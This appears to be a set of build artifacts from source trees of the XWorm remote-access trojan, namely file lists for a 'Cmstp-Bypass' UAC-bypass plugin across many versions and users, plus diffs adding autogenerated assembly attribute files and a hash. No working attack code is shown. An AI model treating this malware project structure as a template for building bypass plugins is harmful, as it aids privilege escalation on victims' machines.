C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\XWorm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\XWorm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\src 2\XWorm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1 @@
a797a412af69e795bef9c71f525e12d5cd31b559d31749a9d586002548b60168
@@ -0,0 +1,8 @@
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\bin\Release\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\bin\Release\Cmstp-Bypass.pdb
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp-Bypass.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp_Bypass.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp-Bypass.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Release\Cmstp-Bypass.pdb